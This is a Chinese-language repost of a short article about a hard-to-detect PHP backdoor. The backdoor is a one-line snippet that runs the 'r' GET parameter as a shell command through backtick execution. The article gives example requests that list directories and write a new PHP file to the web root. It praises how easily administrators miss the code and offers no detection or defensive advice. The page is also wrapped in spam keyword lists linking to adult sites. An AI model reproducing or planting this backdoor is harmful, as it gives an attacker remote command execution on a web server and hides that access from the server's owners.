中文字幕日韩一区二区_国产一区二区av_国产毛片av_久久久久国产一区_色婷婷电影_国产一区二区精品

一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個(gè)一般的phper都不怎么關(guān)注的反撇號(hào) ` ,反撇號(hào)包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會(huì)說沒有問題,但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來了,既然是變量為什么要這樣了,

而且又不是單引號(hào),這個(gè)就是關(guān)鍵所在了,這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵(位于感嘆號(hào)!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測(cè)試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。

php技術(shù)一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 久青草影院 | 国产精品爱久久久久久久 | 国产精品日本一区二区不卡视频 | 国产在线播放一区二区三区 | 久久精品av麻豆的观看方式 | 久久国产欧美日韩精品 | 久久久2o19精品 | 国产一区二区 | 日本黄色一级视频 | 国产黑丝av| 久久精彩 | 日韩无 | 国产精品精品久久久 | 自拍偷拍中文字幕 | av网站免费观看 | 久久精品国产一区二区三区 | 亚洲精品视频免费 | 青娱乐av | 黄视频免费 | 久久人人网 | av中文字幕网站 | 91精品国产乱码久久久久久久久 | 欧美h | 欧美一区二区三区视频 | 中文字幕日韩专区 | 日韩国产黄色片 | av中文字幕网 | 亚洲免费久久久 | 亚洲影音先锋 | 欧美在线成人影院 | 成人精品一区 | 三级欧美 | 欧美日韩久久精品 | 一区二区三区四区在线视频 | 一区二区三区视频在线观看 | 久久毛片| 精品毛片 | 国产一区精品 | 亚洲天堂久久 | 日本大片在线播放 | 久久精品一级 |